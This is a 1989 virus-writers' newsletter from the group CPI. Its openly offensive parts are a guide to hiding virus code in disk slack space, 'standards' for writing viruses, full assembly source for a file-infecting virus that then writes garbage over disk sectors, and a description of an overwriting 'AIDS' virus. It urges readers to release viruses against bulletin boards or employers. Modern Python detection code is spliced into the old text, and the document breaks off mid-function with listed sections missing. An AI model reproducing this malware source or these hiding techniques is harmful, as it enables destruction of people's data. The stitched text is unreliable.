[2.1]

[CPI logo in ASCII art]

        C O R R U P T E D   P R O G R A M M I N G   I N T E R N A T I O N A L

                                  presents:

               @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
               @                                     @
               @      Virili And Trojan Horses       @
               @                                     @
               @     A Protagonist's Point Of View   @
               @                                     @
               @              Issue #2               @
               @                                     @
               @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

DISCLAIMER: All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole purpose of this
document is to educate and spread information. Any illegal or illicit action is
not endorsed by the authors or CPI. The authors and CPI are not responsible for
any information which may present itself as old or misinterpreted, nor for the
actions of the reader. Remember, 'Just Say No!'

CPI #2                 Issue 2, Volume 1              Release Date: July 27, 1989

Introduction To CPI #2
----------------------

Well, here is the "long awaited" second issue of CPI, A Protagonist's Point of
View. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer. Oh yes, if you have some interesting articles or an
application to send us, just see the BBS list at the end of this document.
Thanx. All applications and information will be voted on by the CPI Inner
Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe...
Until our next issue (which may be whenever), good-bye.

Doctor Dissector

Table of Contents
-----------------

Part  Title                                                 Author
-----------------------------------------------------------------------------
2.1   Title Page, Introduction, & TOC....................... Doctor Dissector
2.2   Another Explanation Of Virili And Trojans............. Acid Phreak
2.3   V-IDEA-1.............................................. Ashton Darkside
2.4   V-IDEA-2.............................................. Ashton Darkside
2.5   The Generic Virus..................................... Doctor Dissector
2.6   Aids.................................................. Doctor Dissector
2.7   Batch File Virus...................................... PHUN 3.2
2.8   Basic Virus........................................... PHUN 3.2
2.9   The Alemeda Virus..................................... PHUN 4.3
2.10  Virili In The News.................................... Various Sources
2.11  Application For CPI................................... CPI Inner Circle

(CPI Node Phone #'s Are In 2.11)

[2.2]

Explanation of Viruses and Trojan Horses
----------------------------------------
Written by Acid Phreak

Like its biological counterpart, a computer virus is an agent of infection,
insinuating itself into a program or disk and forcing its host to replicate
the virus code. Hackers fascinated by the concept of "living" code wrote the
first viruses as projects or as pranks. In the past few years, however, a
different kind of virus has become common, one that lives up to an earlier
meaning of the word: in Latin, virus means poison.

These new viruses incorporate features of another type of insidious program
called a Trojan horse. Such a program masquerades as a useful utility or
product but wreaks havoc on your system when you run it. It may erase a few
files, format your disk, steal secrets: anything software can do, a Trojan
horse can do. A malicious virus can do all this and then attempt to replicate
itself and infect other systems.
The growing media coverage of the virus concept, and of specific viruses, has
promoted the development of a new type of software. Antivirus programs,
vaccines: they go by many names, but their purpose is to protect against virus
attack. At present there are more antivirus programs than known viruses (not
for long).

Some experts quibble about exactly what a virus is. The most widely known
"viruses", the IBM Xmas virus and the recent Internet virus, are not viruses
according to some experts because they do not infect other programs. Others
argue that every Trojan horse is a virus, one that depends completely on people
to spread it.

How They Reproduce:
-------------------

Viruses can't travel without people. Your PC will not become infected unless
someone runs an infected program on it, whether accidentally or on purpose. PCs
are different from networked multi-user systems in this way: the Internet virus
of November 1988 (which ran on networked Unix hosts, not mainframes) spread by
transmitting itself to other systems and ordering them to execute it as a
program. That kind of active transmission is not possible on a stand-alone PC.

Virus code reproduces by changing something in your system. Some viruses strike
COMMAND.COM or the hidden system files. Others, like the notorious Pakistani
Brain virus, modify the boot sector of floppy disks. Still others attach
themselves to any .COM or .EXE file. In truth, any file on your system that can
be executed, whether it's a program, a device driver, an overlay, or even a
batch file, could be the target of a virus.

When an infected program runs, the virus code usually executes first and then
transfers control to the original program. The virus may immediately infect
other programs, or it may load itself into RAM and continue spreading from
there. If the virus can infect a file that will be used on another system, it
has succeeded.

What They Can Do:
-----------------

Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain event occurs: perhaps reaching a
special date, or running the virus a certain number of times. It wouldn't make
sense for a virus to damage your system the first time it ran; it needs some
time to grow and spread first.

The most vulnerable spot for a virus attack is your hard disk's file allocation
table (FAT). This table tells DOS where every file's data resides on the disk.
Without the FAT, the data is still there but DOS can't find it. A virus could
also perform a low-level format on some or all of the tracks of your hard disk,
erase all files, or change the CMOS memory on AT-class computers so that they
don't recognize the hard disk. Most of the dangers involve data only, but it's
even possible to burn out a monochrome monitor with the right code.

Some virus assaults are quite subtle. One known virus finds four consecutive
digits on the screen and switches two. Let's hope you're not balancing the
company's books when this one hits. Others slow down system operations or
introduce serious errors.

[2.3]
-------------------------------------------------------------------------------

[CPI logo in ASCII art]

                   "We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

       C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

                              * * * present * * *

         "Ok, I've written the virus, now where the hell do I put it?"

                   By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful.
The fact that the author knows and spreads this information in no way suggests
that he uses it. The author also accepts no responsibility for the malicious
use of this information by anyone who reads it! Remember, we may talk a lot,
but we "just say no" to doing it.
*******************************************************************************

Ok, wow! You've just invented the most incredibly nifty virus. It slices, it
dices, it squishes, it mushes (sorry Berke Breathed) people's data! But the
only problem is, if you go around infecting every damn file, some cute software
company is going to start putting in procedures that checksum their warez each
time they run, which will make life for your infecting virus a total bitch. Or
somebody's going to come up with an incredibly nifty vaccination util that will
wipe it out. Because, I mean, hey, when disk space starts vanishing suddenly in
500K chunks people tend to notice. Especially people like me that rarely have
more than 4096 bytes free on their HD anyway.

Ok. So you're saying "wow, so what, I can make mine fool-proof", etc, etc. But
wait! There's no need to go around wasting your precious time when the answer
is right there in front of you! Think about it: you could be putting that time
into writing better and more innovative viruses, or you could be worrying about
keeping the file size, the date & time, and the attributes the same. With this
system, you only need to infect one file, preferably one that's NOT a system
file, but something that will get run a lot and will be able to load your nifty
virus on a daily basis. This system also doesn't take up any disk space, other
than the loader. And the loader could conceivably be under 16 bytes (damn near
undetectable).

First of all, you need to know what programs to infect. Now, everybody knows
about using COMMAND.COM, and that's unoriginal anyway, when there are other
programs people run all the time.
Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get
the idea. Better still are DOS commands like FORMAT, LINK or even compression
utilities. But you get the point. Besides, who's going to miss 16 bytes, right?

Now, the good part: where to put the damn thing. One note to the programmer:
this could get tricky if your virus is over 2K or isn't written in assembly,
but the size problem is easy enough; it would be a simple thing to break your
virus into parts and have the parts load each other into the system so that
you do eventually get the whole thing. The only problem with using languages
besides assembly is that it's hard to break them up into 2K segments. If you
want to infect floppies, or smaller disks, you'd be best off breaking your file
into 512-byte segments, since they're easier to hide. But, hey, in assembly you
can generate pretty small programs that do a lot.

Ok, by now you've probably figured out that we're talking about the part of the
disk called 'the slack'. Every disk that your computer uses is divided up into
parts called sectors, which are (in almost all cases) 512 bytes. But on larger
disks, and even on floppies, keeping track of every single sector would be a
complete bitch. So the sectors are bunched together into groups called
'clusters'. On floppy disks clusters are usually two sectors, or 1024 bytes
(true of 360K and 720K disks; 1.2M and 1.44M disks use one sector per cluster),
and on hard disks they're typically 4096 bytes, or eight sectors. Now think
about it: you have programs on your hard disk, and what are the odds that they
will have sizes that always end up in increments of 4096? If I've lost you,
think of it this way: the file takes up a bunch of clusters, but in the last
cluster it uses there is usually some 'slack', or space that isn't used by the
file. This space is between where the actual file ends and where the actual
cluster ends. So, potentially, you can have up to 4095 bytes of 'slack' on a
file on a hard disk, or 1023 bytes of 'slack' on a floppy.
In fact, right now, run the Norton program's 'FS /S /T' command from your root
directory and subtract the total size of the files from the total disk space
used. That's how much 'slack' space is on your disk (a hell of a lot, even on a
floppy).

To use the slack, all you need to do is find a chunk of slack big enough to fit
your virus (or a segment of your virus) and use direct disk access (INT 13) to
put your virus there. There is one minor problem with this. Any disk write to
that cluster will overwrite the slack with 'garbage' from memory. This is
because of the way DOS manages its disk I/O, and it can't be fixed without a
lot of hassle. But there is a way around even this. And it involves a popular
(albeit outdated and usually ineffectual) form of virus protection called the
READ-ONLY flag. This flag is the greatest friend of this type of virus. Because
if the file is not written to, the last cluster is not written to, and voila!
Your virus is safe from mischievous accidents. And since the R-O flag doesn't
affect INT 13 disk I/O, it won't be in your way. Also, check for programs with
the SYSTEM flag set, because that has the same read-only effect (even though I
haven't seen it written, it's true that if the file is designated system, DOS
treats it as read-only, whether the R-O flag is set or not). The space after
IBMBIO.COM or IBMDOS.COM in PC-DOS (IO.SYS and MSDOS.SYS are the equivalents in
MS-DOS), or a protected (!) COMMAND.COM file in either type of DOS, would be
ideal for this.

All you have to do is then insert your loader into some innocent-looking file,
and you are in business. All your loader has to do is read the sector into the
highest part of memory and do a far call to it. Your virus can then go about
waiting for floppy disks to infect, and place loaders on any available
executable file on the disk. Sound pretty neat? It is!
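The slack arithmetic above is easy to get wrong by one, so here is the same
calculation worked through in code. This is an added example written for this
edition, not code from the article or from CPI. It reads the cluster size out of
a FAT boot sector's BIOS Parameter Block the way a scanner would, computes the
per-file slack the article describes, lists which files have enough slack to
hold a given payload, and (the check a defender wants) verifies that the bytes
between a file's end of data and the end of its last cluster are still zero.
The boot sector and cluster buffer are constructed inline for the demonstration;
no real disk is touched.

```python
"""Slack-space arithmetic and a slack-is-clean check for FAT volumes.

Added example; not part of the original CPI text.  The boot sector and
the cluster contents used in __main__ are constructed here.
"""
import struct

SECTOR = 512


def cluster_size(boot_sector: bytes) -> int:
    """Return bytes per cluster from a FAT12/FAT16 boot sector.

    BPB fields used (offsets from the start of the sector):
      0x0B  bytes per sector    (uint16, little-endian)
      0x0D  sectors per cluster (uint8)
    """
    if len(boot_sector) < 64 or boot_sector[510:512] != b"\x55\xAA":
        raise ValueError("not a boot sector (missing 55AA signature)")
    bytes_per_sector, sectors_per_cluster = struct.unpack_from("<HB", boot_sector, 0x0B)
    if bytes_per_sector == 0 or sectors_per_cluster == 0:
        raise ValueError("BPB reports a zero-sized sector or cluster")
    return bytes_per_sector * sectors_per_cluster


def slack(file_size: int, cluster: int) -> int:
    """Unused bytes in the file's last cluster.

    0 for an empty file (it owns no cluster) and for sizes that are an
    exact multiple of the cluster size; at most cluster-1 otherwise.
    """
    if file_size == 0:
        return 0
    return (-file_size) % cluster


def total_slack(sizes, cluster: int) -> int:
    """What 'FS /S /T' minus the sum of file sizes would report."""
    return sum(slack(s, cluster) for s in sizes)


def files_with_room(sizes, cluster: int, payload: int) -> list:
    """Indices of files whose slack could hold `payload` bytes: the
    search the article describes, and therefore the files a scanner
    should look at first."""
    return [i for i, s in enumerate(sizes) if slack(s, cluster) >= payload]


def slack_is_clean(last_cluster: bytes, file_size: int, cluster: int) -> bool:
    """True if everything past end-of-data in the file's last cluster is
    zero.  Any non-zero byte there is either DOS's buffer garbage or a
    stash, and either way deserves a look."""
    used = file_size % cluster
    if used == 0 and file_size != 0:
        used = cluster          # file ends exactly on a cluster boundary
    return not any(last_cluster[used:cluster])


def make_boot_sector(bytes_per_sector: int = 512, sectors_per_cluster: int = 8) -> bytes:
    """Constructed boot sector carrying only the BPB fields we parse."""
    sec = bytearray(SECTOR)
    sec[0:3] = b"\xEB\x3C\x90"          # JMP SHORT + NOP, as real boot sectors start
    sec[3:11] = b"MSDOS3.3"
    struct.pack_into("<HB", sec, 0x0B, bytes_per_sector, sectors_per_cluster)
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


if __name__ == "__main__":
    cl = cluster_size(make_boot_sector())            # 4096 on the article's hard disk
    sizes = [17, 4096, 4097, 13847]                  # constructed file sizes
    print("cluster:", cl, "slack per file:", [slack(s, cl) for s in sizes],
          "total:", total_slack(sizes, cl))
    print("room for a 520-byte segment in files:", files_with_room(sizes, cl, 520))
    last = bytearray(cl)
    last[:17] = b"A" * 17                            # a 17-byte file owns the whole cluster
    print("clean:", slack_is_clean(bytes(last), 17, cl))
    last[4000] = 0x90                                # something planted in the slack
    print("clean after planting:", slack_is_clean(bytes(last), 17, cl))
```

Note that `slack_is_clean` only flags a cluster whose tail is non-zero; as the
article says, an ordinary DOS write to that cluster fills the slack with whatever
was in the buffer, so a non-zero tail is a lead, not proof.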
Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works, to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: Watch it, this file (by itself) has about 3 1/2K of slack (on a hard disk).

Call these boards because the sysops are cool:

Oblivion (SATAN HQ)               Sysop: Agent Orange (SATAN leader)
Utopia (SATAN HQ)                 Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ)     Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ)                Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto

And if I forgot your board, sorry, but don't send me E-mail bitching about it!

[2.4]
-------------------------------------------------------------------------------

[CPI logo in ASCII art]

                   "We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------

       C O R R U P T E D   P R O G R A M M E R S   I N T E R N A T I O N A L

                              * * * present * * *

          CPI Virus Standards - Protect yourself and your friends

                   By Ashton Darkside (DUNE / SATAN / CPI)

*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts no
responsibility for the malicious use of this information by anyone who reads
it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************

One of the main problems with viruses is that once you set one loose, it is no
longer under your control. I propose to stop this by introducing some standards
of virus writing that will enable them to be deactivated whenever they enter a
'friendly' (CPI) system. In the long run, even the author of the virus is not
immune to being attacked.

The following are what I have termed the CPI standards for writing viruses.
They will allow a virus to easily check any system it is being run on for a
type of 'identity badge'. If it is found, the virus will not infect the system
it is being run on. The other standards are mostly written around this.

CPI Standards for writing viruses
---------------------------------

1 - The virus will have an 'active period' and an 'inactive period'. The active
    periods will be no more than one year in length (to make it more difficult
    to discover the virus). You may release different versions of your virus
    with different 'active periods'.
    It is not recommended that your virus deactivate itself after the set
    active period, as this would enable people to deactivate viruses by using
    their computer with the date set to 2069 or something. It is also required
    that activation periods begin on January 1 and end on December 31. This
    will coincide with the changing identity codes.

2 - The virus will check for an identity code by executing Interrupt 12h with
    the following register settings: AX = 4350h, BX = 4920h, CX = AB46h,
    DX = 554Eh. If the system is friendly, then a pointer will be returned in
    CX:DX to an ASCIIZ (0-terminated) string which will have different contents
    in different years. (INT 12h is normally the BIOS "get conventional memory
    size" call, which returns the size in KB in AX, so whatever answers these
    magic values on a friendly system has to pass every other INT 12h call
    through to the original handler untouched.) The codes are not to be
    included in any text file, and should only be given through E-mail on CPI
    affiliated systems. You can always ask me by sending me mail at The
    Andromeda Strain BBS. If a system is detected as friendly, the virus will
    not attempt to infect or damage it, but it is ok to display a little
    greeting message about how lucky the user was.

3 - We very much encourage you to upload your virus, along with a brief
    description of its workings, into the CPI section at The Andromeda Strain
    BBS. Only CPI members will know about your virus. This is so that CPI
    members can share techniques, and it also allows us to verify that the
    identity check works. If we see any improvements that could be made, such
    as ways to streamline code, better ways of spreading, etc., we will inform
    you so that you can make the changes if you wish.

4 - It is also suggested that you use the ADS standard for virus storage on
    infected disks. This method uses disk slack space for storage and is more
    thoroughly described in a previous text file by me. I think that this is
    the most effective and invisible way to store viruli.

5 - A list of CPI-Standard viruli will be available at all times from The
    Andromeda Strain BBS, to CPI users.
    Identity strings will also be available to anyone in CPI, or anyone who
    uploads source code to a virus which is 100% complete except for the
    identity string (it must be written to CPI standards). Non-CPI members who
    do this will be more seriously considered for membership in CPI.

Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)

PS: This file (by itself) has approx 2.5K of slack.

;[2.5]
;=============================================================================
;
;                                   C*P*I
;
;                    CORRUPTED PROGRAMMING INTERNATIONAL
;                    -----------------------------------
;                             p r e s e n t s
;
;                                 T H E
;                                _     _
;                           (g) GENERIC VIRUS (g)
;                                ^     ^
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TOO BIG TO
; FIT IN MEMORY". THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATELY ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================

MAIN:
        NOP                     ;| Marker bytes that identify this program
        NOP                     ;| as infected/a virus
        NOP                     ;|
        MOV AX,00               ;| Initialize the pointers
        MOV ES:[POINTER],AX     ;|
        MOV ES:[COUNTER],AX     ;|
        MOV ES:[DISKS B],AL     ;|
        MOV AH,19               ;| Get the selected drive (dir?)
        INT 21                  ;|
        MOV CS:DRIVE,AL         ;| Get current path (save drive)
        MOV AH,47               ;| (dir?)
        MOV DH,0                ;|
        ADD AL,1                ;|
        MOV DL,AL               ;| (in actual drive)
        LEA SI,CS:OLD_PATH      ;|
        INT 21                  ;|
        MOV AH,0E               ;| Find # of drives
        MOV DL,0                ;|
        INT 21                  ;|
        CMP AL,01               ;| (Check if only one drive)
        JNZ HUPS3               ;| (If not one drive, go to HUPS3)
        MOV AL,06               ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3:  MOV AH,0                ;| Execute this if there is more than 1 drive
        LEA BX,SEARCH_ORDER     ;|
        ADD BX,AX               ;|
        ADD BX,0001             ;|
        MOV CS:POINTER,BX       ;|
        CLC                     ;|
CHANGE_DISK:                    ;| Carry is set if no more .COM files are
        JNC NO_NAME_CHANGE      ;| found. From here, .EXE files will be
        MOV AH,17               ;| renamed to .COM (change .EXE to .COM)
        LEA DX,CS:MASKE_EXE     ;| but will cause the error message "Program
        INT 21                  ;| too large to fit in memory" when starting
        CMP AL,0FF              ;| larger infected programs
        JNZ NO_NAME_CHANGE      ;| (Check if an .EXE is found)
        MOV AH,2CH              ;| If neither .COM nor .EXE files can be found,
        INT 21                  ;| then random sectors on the disk will be
        MOV BX,CS:POINTER       ;| overwritten depending on the system time
        MOV AL,CS:[BX]          ;| in milliseconds. This is the time of the
        MOV BX,DX               ;| complete "infection" of a storage medium.
        MOV CX,2                ;| The virus can find nothing more to infect
        MOV DH,0                ;| and starts its destruction.
        INT 26                  ;| (write crap on disk)
NO_NAME_CHANGE:                 ;| Check if the end of the search order table
        MOV BX,CS:POINTER       ;| has been reached. If so, end.
        DEC BX                  ;|
        MOV CS:POINTER,BX       ;|
        MOV DL,CS:[BX]          ;|
        CMP DL,0FF              ;|
        JNZ HUPS2               ;|
        JMP HOPS                ;|
HUPS2:                          ;| Get a new drive from the search order table
        MOV AH,0E               ;| and select it, beginning with the ROOT dir.
        INT 21                  ;| (change drive)
        MOV AH,3B               ;| (change path)
        LEA DX,PATH             ;|
        INT 21                  ;|
        JMP FIND_FIRST_FILE     ;|
FIND_FIRST_SUBDIR:              ;| Starting from the root, search for the
        MOV AH,17               ;| first subdir. First, (change .exe to .com)
        LEA DX,CS:MASKE_EXE     ;| convert all .EXE files to .COM in the
        INT 21                  ;| old directory.
        MOV AH,3B               ;| (use root directory)
        LEA DX,PATH             ;|
        INT 21                  ;|
        MOV AH,04E              ;| (search for first subdirectory)
        MOV CX,00010001B        ;| (dir mask)
        LEA DX,MASKE_DIR        ;|
        INT 21                  ;|
        JC CHANGE_DISK          ;|
        MOV BX,CS:COUNTER       ;|
        INC BX                  ;|
        DEC BX                  ;|
        JZ USE_NEXT_SUBDIR      ;|
FIND_NEXT_SUBDIR:               ;| Search for the next sub-dir; if no more
        MOV AH,4FH              ;| are found, the (search for next subdir)
        INT 21                  ;| drive will be changed.
        JC CHANGE_DISK          ;|
        DEC BX                  ;|
        JNZ FIND_NEXT_SUBDIR    ;|
USE_NEXT_SUBDIR:
        MOV AH,2FH              ;| Select found directory. (get dta address)
        INT 21                  ;|
        ADD BX,1CH              ;|
        MOV ES:[BX],W"\"        ;| (address of name in dta)
        INC BX                  ;|
        PUSH DS                 ;|
        MOV AX,ES               ;|
        MOV DS,AX               ;|
        MOV DX,BX               ;|
        MOV AH,3B               ;| (change path)
        INT 21                  ;|
        POP DS                  ;|
        MOV BX,CS:COUNTER       ;|
        INC BX                  ;|
        MOV CS:COUNTER,BX       ;|
FIND_FIRST_FILE:                ;| Find first .COM file in the current dir.
        MOV AH,04E              ;| If there are none, (Search for first)
        MOV CX,00000001B        ;| search the next directory. (mask)
        LEA DX,MASKE_COM        ;|
        INT 21                  ;|
        JC FIND_FIRST_SUBDIR    ;|
        JMP CHECK_IF_ILL        ;|
FIND_NEXT_FILE:                 ;| If program is ill (infected) then search
        MOV AH,4FH              ;| for another. (search for next)
        INT 21                  ;|
        JC FIND_FIRST_SUBDIR    ;|
CHECK_IF_ILL:                   ;| Check if already infected by virus.
        MOV AH,3D               ;| (open channel)
        MOV AL,02               ;| (read/write)
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|
        MOV BX,AX               ;| (save channel)
        MOV AH,3FH              ;| (read file)
        MOV CH,BUFLEN           ;|
        MOV DX,BUFFER           ;| (write in buffer)
        INT 21                  ;|
        MOV AH,3EH              ;| (close file)
        INT 21                  ;|
        MOV BX,CS:[BUFFER]      ;| (look for the NOP marker; note that this
        CMP BX,9090             ;|  compares only the first two bytes)
        JZ FIND_NEXT_FILE       ;|
        MOV AH,43               ;| This section by-passes (write enable)
        MOV AL,0                ;| the MS/PC DOS write protection.
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|
        MOV AH,43               ;|
        MOV AL,01               ;|
        AND CX,11111110B        ;|
        INT 21                  ;|
        MOV AH,3D               ;| Open file for read/write (open channel)
        MOV AL,02               ;| access (read/write)
        MOV DX,9EH              ;| (address of name in dta)
        INT 21                  ;|
        MOV BX,AX               ;| Read date entry of program and (channel)
        MOV AH,57               ;| save for future use. (get date)
        MOV AL,0                ;|
        INT 21                  ;|
        PUSH CX                 ;| (save date)
        PUSH DX                 ;|
        MOV DX,CS:[CONTA W]     ;| The jump located at 0100h (save old jmp)
        MOV CS:[JMPBUF],DX      ;| in the program will be saved for future use.
        MOV DX,CS:[BUFFER+1]    ;| (save new jump)
        LEA CX,CONT-100         ;|
        SUB DX,CX               ;|
        MOV CS:[CONTA],DX       ;|
        MOV AH,57               ;| The virus now copies itself (write date)
        MOV AL,1                ;| to the start of the file.
        POP DX                  ;|
        POP CX                  ;| (restore date)
        INT 21                  ;|
        MOV AH,3EH              ;| (close file)
        INT 21                  ;|
        MOV DX,CS:[JMPBUF]      ;| Restore the old jump address. The virus
        MOV CS:[CONTA],DX       ;| keeps at address "CONTA" the jump which was
                                ;| at the start of the program. This is done to
HOPS:                           ;| preserve the executability of the host
        NOP                     ;| program as much as possible. After saving,
        CALL USE_OLD            ;| it still works with the jump address in the
                                ;| virus. The jump address in the virus differs
                                ;| from the jump address in memory.
CONT    DB 0E9                  ;| Continue with the host program (make jump)
CONTA   DW 0                    ;|
        MOV AH,00               ;|
        INT 21                  ;|
USE_OLD:
        MOV AH,0E               ;| Reactivate the drive that was (use old drive)
        MOV DL,CS:DRIVE         ;| selected at the start of the program, and
        INT 21                  ;| reactivate the path that was selected
        MOV AH,3B               ;| at the start of the program. (use old path)
        LEA DX,OLD_PATH-1       ;| (get old path and backslash)
        INT 21                  ;|
        RET                     ;|

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER   DW 0000               ;| (pointer f. search order)
COUNTER   DW 0000               ;| (counter f. nth. search)
DISKS     DB 0                  ;| (number of disks)
MASKE_COM DB "*.COM",00         ;| (search for com files)
MASKE_DIR DB "*",00             ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
          DB 0,"????????EXE",0,0,0,0
          DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
          DB 0,"???????????",0,0,0,0
          DB 0,"????????COM",0
BUFFER    EQU 0E00              ;| (a safe place)
BUFLEN    EQU 208H              ;| Length of virus. Modify this accordingly
                                ;| if you modify this source. Be careful,
                                ;| for this may change!
JMPBUF    EQU BUFFER+BUFLEN     ;| (a safe place for jmp)
PATH      DB "\",0              ;| (first place)
DRIVE     DB 0                  ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH  DB 32 DUP (?)         ;| (old path)

[2.6]

[Title box: CORRUPTED PROGRAMMING INTERNATIONAL presents AIDS, a new and
improved virus for PC/MS DOS machines. Created by: Doctor Dissector. File
intended for educational use only; author not responsible for readers; does
not endorse any illegal activities.]

Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system
time. Plus, any READ-ONLY attribute will ward this virus off; it doesn't like
them! Anyway, this virus was originally named NUMBER ONE, and I modified the
code so that it would fit my needs. The source code, which is included with
this neato package, was written in Turbo Pascal 3.01a. Yeah, I know it's old,
but it works. Well, I added a few things; you can experiment or mess around
with it if you'd like to, and add any mods to it that you want, but change the
name and give us some credit if you do.

The virus body is approximately 13.8K long (VirusSize = 13847 in the source),
and it is written over the START of the host COM file rather than appended to
it: a host shorter than that grows to about 13.8K, and a longer host keeps its
size but loses its first 13.8K of code. If no more COM files are to be found,
it picks a random value from 0-9, and if it happens to be the lucky number 7,
AIDS will present a nice screen with lots of smiles, with a note telling the
operator that their system is now screwed, I mean permanently. Because the
host's own code is overwritten, files carrying AIDS are IRREVERSIBLY messed
up. Oh well...
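Both infectors in this issue leave a fixed marker in the host so they do not
re-infect it, and that is exactly what a scanner keys on. The following is an
added example written for this edition, not code from the zine or from CPI. It
checks a .COM image for the Generic Virus marker above (the body starts with
three NOPs, but its own CHECK_IF_ILL test only compares the first two bytes
against 9090h, so the same two-byte test is used here) and for the AIDS marker
from the Turbo Pascal source that follows (a length-prefixed String[42] at file
offset 80h, which is 0180h in the COM segment, holding 'This File Has Been
Infected By AIDS! HaHa!'). It also applies a generic heuristic for the
appender-style infection described in part 2.2: a COM file whose first
instruction jumps into the last few hundred bytes of the file. The sample files
are constructed inline; the 768-byte "tail" window is this example's own
assumption, not something from the text.

```python
"""Static checks for the two COM infectors printed in CPI #2.

Added example; not code from the zine.  All sample files are constructed
below.  TAIL_WINDOW is an assumed threshold for the appender heuristic.
"""

AIDS_TEXT = b"This File Has Been Infected By AIDS! HaHa!"
AIDS_MARK = bytes([len(AIDS_TEXT)]) + AIDS_TEXT   # Pascal String[42]: length byte first
AIDS_OFFSET = 0x80                                # file offset of Cseg:$180 in a .COM
TAIL_WINDOW = 0x300                               # assumption: jumps into the last 768 bytes are suspect


def has_generic_marker(data: bytes) -> bool:
    """Generic Virus: entry begins with NOP NOP (the virus checks only two)."""
    return data[:2] == b"\x90\x90"


def has_aids_marker(data: bytes) -> bool:
    """AIDS: length-prefixed warning string at offset 80h."""
    end = AIDS_OFFSET + len(AIDS_MARK)
    return len(data) >= end and data[AIDS_OFFSET:end] == AIDS_MARK


def entry_jump_target(data: bytes):
    """File offset a leading JMP rel16 (E9) or JMP rel8 (EB) lands on, or
    None if the file does not start with a jump.  COM files load at 0100h,
    but the jumps are relative so the load address cancels out."""
    if len(data) >= 3 and data[0] == 0xE9:
        rel = int.from_bytes(data[1:3], "little", signed=True)
        return 3 + rel
    if len(data) >= 2 and data[0] == 0xEB:
        rel = int.from_bytes(data[1:2], "little", signed=True)
        return 2 + rel
    return None


def jumps_to_tail(data: bytes) -> bool:
    """Appender heuristic: the entry jump lands inside the last TAIL_WINDOW bytes."""
    target = entry_jump_target(data)
    if target is None or len(data) <= TAIL_WINDOW:
        return False
    return len(data) - TAIL_WINDOW <= target < len(data)


def scan_com(data: bytes) -> list:
    """Return the list of findings for one .COM image (empty means clean)."""
    findings = []
    if has_generic_marker(data):
        findings.append("generic-virus marker (NOP NOP at entry)")
    if has_aids_marker(data):
        findings.append("AIDS marker string at offset 80h")
    if jumps_to_tail(data):
        findings.append("entry JMP into file tail (appender heuristic)")
    return findings


# --- constructed samples ------------------------------------------------
def sample_clean() -> bytes:
    """MOV AH,4Ch / INT 21h (exit) followed by zero padding."""
    return b"\xB4\x4C\xCD\x21" + bytes(0x200)


def sample_generic() -> bytes:
    """Three NOPs then the rest of a 208h-byte body (BUFLEN in the listing)."""
    return b"\x90\x90\x90" + bytes(0x205)


def sample_aids() -> bytes:
    """Zero body with the AIDS string planted where MarkInfected lives."""
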